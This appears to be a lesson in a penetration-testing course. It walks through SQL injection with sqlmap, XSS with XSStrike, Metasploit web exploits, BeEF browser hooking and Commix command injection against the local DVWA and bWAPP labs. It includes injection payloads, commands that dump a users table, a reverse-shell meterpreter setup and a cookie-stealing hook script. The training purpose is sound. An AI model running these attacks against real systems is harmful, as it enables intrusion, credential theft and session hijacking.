Day 5: Exploitation & Injection Attacks

Exploiting Websites with SQLMap, XSStrike, and Metasploit

Exploitation and injection attacks are critical components of penetration testing, allowing security professionals to identify and mitigate vulnerabilities in web applications. Parrot OS, a Debian-based Linux distribution tailored for cybersecurity, provides a powerful suite of tools for executing these attacks in a controlled environment. On Day 5 of this 7-day learning series, we focus on exploiting web vulnerabilities using automated and manual techniques. This article covers automated SQL injection with sqlmap, advanced Cross-Site Scripting (XSS) testing with XSStrike, and web-based Common Vulnerabilities and Exposures (CVE) exploitation with Metasploit. Additionally, we guide you through setting up local testing environments using Damn Vulnerable Web Application (DVWA) and bWAPP. To enhance your skillset, we include additional tools like BeEF and Commix for broader exploitation capabilities. By mastering these tools and techniques, you will gain the expertise needed to perform ethical exploitation in a safe, controlled setting.

Understanding Exploitation and Injection Attacks

Exploitation involves leveraging vulnerabilities to gain unauthorized access, extract data, or compromise systems. Injection attacks, a subset of exploitation, target input fields to manipulate application behavior. Below, we outline the key attack types covered in this article.

SQL Injection (SQLi)

SQL injection exploits vulnerabilities in web applications that fail to sanitize user inputs, allowing attackers to inject malicious SQL queries. This can lead to unauthorized data access, database manipulation, or authentication bypass.

• Example: Entering ' OR '1'='1 in a login form to bypass authentication.
• Impact: Data theft, privilege escalation, or database corruption.

Cross-Site Scripting (XSS)

XSS attacks inject malicious scripts into web pages viewed by users, executing in their browsers to steal data, hijack sessions, or deface websites.

• Types:
  • Stored XSS: Scripts are stored on the server (e.g., in comments) and executed for all users.
  • Reflected XSS: Scripts are embedded in URLs or inputs and executed when accessed.
  • DOM-based XSS: Scripts manipulate the browser’s Document Object Model.
• Example: Injecting <script>alert('XSS')</script> to display a pop-up.

Web-Based CVE Exploitation

Common Vulnerabilities and Exposures (CVEs) are publicly disclosed vulnerabilities with assigned identifiers. Web-based CVEs often target specific software versions (e.g., outdated CMS plugins) and can be exploited to gain unauthorized access or execute code.

• Example: Exploiting a known vulnerability in a web server like Apache Struts.
• Impact: Remote code execution, data breaches, or system compromise.

Outcome: You understand the mechanics and risks of SQLi, XSS, and CVE-based attacks, preparing you for practical exploitation.

Setting Up Local Testing Environments

Testing exploits in a controlled environment is essential for ethical hacking. We use Damn Vulnerable Web Application (DVWA) and bWAPP (Buggy Web Application) on a LAMP stack to simulate vulnerable web applications.

Configuring DVWA

DVWA, set up in Day 4, is ideal for testing SQLi and XSS vulnerabilities.

1. Verify LAMP Stack:

   sudo systemctl status apache2
   sudo systemctl status mysql

   Ensure Apache and MySQL are running.
2. Access DVWA: Navigate to http://localhost/dvwa, log in with admin/password, and set the security level to “Low” for easier exploitation.

Installing bWAPP

bWAPP is another vulnerable web application with a wide range of vulnerabilities for testing.

1. Download bWAPP:

   git clone https://github.com/raesene/bWAPP.git /var/www/html/bwapp

   Clones bWAPP into Apache’s web directory.
2. Configure bWAPP:
   • Edit /var/www/html/bwapp/config.inc.php to set database credentials (e.g., root, password: p@ssw0rd).
   • Create a database:

     sudo mysql
     CREATE DATABASE bwapp;
     GRANT ALL PRIVILEGES ON bwapp.* TO 'bwapp'@'localhost' IDENTIFIED BY 'p@ssw0rd';
     FLUSH PRIVILEGES;
     EXIT;

3. Set Permissions:

   sudo chown -R www-data:www-data /var/www/html/bwapp
   sudo chmod -R 755 /var/www/html/bwapp

4. Install bWAPP: Navigate to http://localhost/bwapp/install.php, follow the setup wizard, and log in with bee/bug.

Outcome: You have two vulnerable web applications (DVWA and bWAPP) for safe, controlled exploit testing.

Automated SQL Injection with sqlmap

sqlmap is an automated tool for SQL injection and database takeover, capable of detecting and exploiting SQLi vulnerabilities.

Using sqlmap

1. Basic Scan:

   sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id"

   Scans a URL for SQLi vulnerabilities. Replace PHPSESSID with your DVWA session cookie (obtained via browser developer tools).
2. Enumerate Databases:

   sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" --dbs

   Lists available databases.
3. Dump Tables:

   sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" -D dvwa --tables

   Dumps tables from the dvwa database.
4. Dump Data:

   sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" -D dvwa -T users --dump

   Extracts data from the users table.

Ethical Note: Only test sqlmap on systems you own or have explicit permission to scan. Unauthorized testing is illegal.

Outcome: You can automate SQL injection attacks to extract database information.

Advanced XSS with XSStrike

XSStrike is a sophisticated tool for detecting and exploiting XSS vulnerabilities, offering advanced payload generation and evasion techniques.

Using XSStrike

1. Install XSStrike (if not pre-installed):

   git clone https://github.com/s0md3v/XSStrike.git
   cd XSStrike
   pip3 install -r requirements.txt

2. Basic Scan:

   python3 xsstrike.py -u "http://localhost/dvwa/vulnerabilities/xss_r/?name=test"

   Tests the URL for reflected XSS vulnerabilities.
3. Crawl and Test:

   python3 xsstrike.py -u "http://localhost/dvwa" --crawl

   Crawls the site and tests all input fields.
4. Advanced Payloads:

   python3 xsstrike.py -u "http://localhost/dvwa/vulnerabilities/xss_r/?name=test" --fuzzer

   Uses fuzzing to generate custom payloads.

Outcome: You can detect and exploit XSS vulnerabilities with advanced payloads.

Using Metasploit for Web-Based CVE Exploitation

Metasploit Framework is a penetration testing platform that includes exploits for web-based CVEs, enabling you to test vulnerabilities in software like CMS platforms or web servers.

Using Metasploit

1. Launch Metasploit:

   msfconsole

2. Search for Exploits:

   search type:exploit platform:webapp

   Lists web application exploits.
3. Example: Exploit a Vulnerable CMS (e.g., WordPress plugin exploit):
   • Select an exploit:

     use exploit/multi/http/wp_plugin_vuln

   • Configure options:

     set RHOSTS 192.168.1.100
     set RPORT 80
     set TARGETURI /wordpress
     set PAYLOAD php/meterpreter/reverse_tcp
     set LHOST 192.168.1.101

     Replace IPs and paths with your test environment details.
   • Run the exploit:

     exploit

4. Test on bWAPP: bWAPP includes vulnerabilities compatible with Metasploit exploits (e.g., remote file inclusion).

Outcome: You can leverage Metasploit to exploit web-based CVEs in a controlled environment.

Additional Tools: BeEF and Commix

To broaden your exploitation capabilities, Parrot OS includes tools like BeEF and Commix for advanced web attacks.

BeEF (Browser Exploitation Framework)

BeEF exploits browser vulnerabilities to control client-side behavior, often used in conjunction with XSS.

• Launch BeEF:

  beef-xss

  Access the web interface at http://localhost:3000/ui/panel (default credentials: beef/beef).
• Hook a Browser: Inject BeEF’s hook script (<script src="http://localhost:3000/hook.js"></script>) into a vulnerable XSS field in DVWA.
• Execute Commands: Use BeEF’s interface to send commands (e.g., display alerts, steal cookies).

Commix

Commix automates command injection attacks, targeting vulnerabilities that allow execution of system commands.

• Basic Scan:

  commix -u "http://localhost/bwapp/commandi.php?cmd=test"

• Advanced Options:

  commix -u "http://localhost/bwapp/commandi.php?cmd=test" --all

  Tests all injection techniques.

Outcome: You can perform advanced browser and command injection attacks using BeEF and Commix.

Practical Exercise

1. Verify DVWA and install bWAPP on your LAMP stack.
2. Use sqlmap to dump the users table from DVWA’s SQL Injection module.
3. Run XSStrike against DVWA’s Reflected XSS module and confirm a payload execution.
4. Test a Metasploit web exploit against bWAPP’s Remote File Inclusion module.
5. Use BeEF to hook a browser via DVWA’s Stored XSS module.
6. Test bWAPP’s Command Injection module with Commix.

Conclusion

Day 5 of this 7-day series has equipped you with the skills to perform exploitation and injection attacks using Parrot OS’s advanced tools. By mastering sqlmap for SQL injection, XSStrike for XSS, Metasploit for CVE exploitation, and additional tools like BeEF and Commix, you can effectively test web vulnerabilities in controlled environments like DVWA and bWAPP. These skills are critical for ethical hacking and vulnerability assessment. Continue practicing in a safe, legal setting, and prepare for Day 6, where you will explore digital forensics with tools like Autopsy.

Next Steps:

• Experiment with additional DVWA and bWAPP vulnerabilities.
• Explore other Parrot OS tools like SET (Social Engineering Toolkit) for advanced attacks.
• Engage with cybersecurity communities on platforms like X to share insights and learn best practices.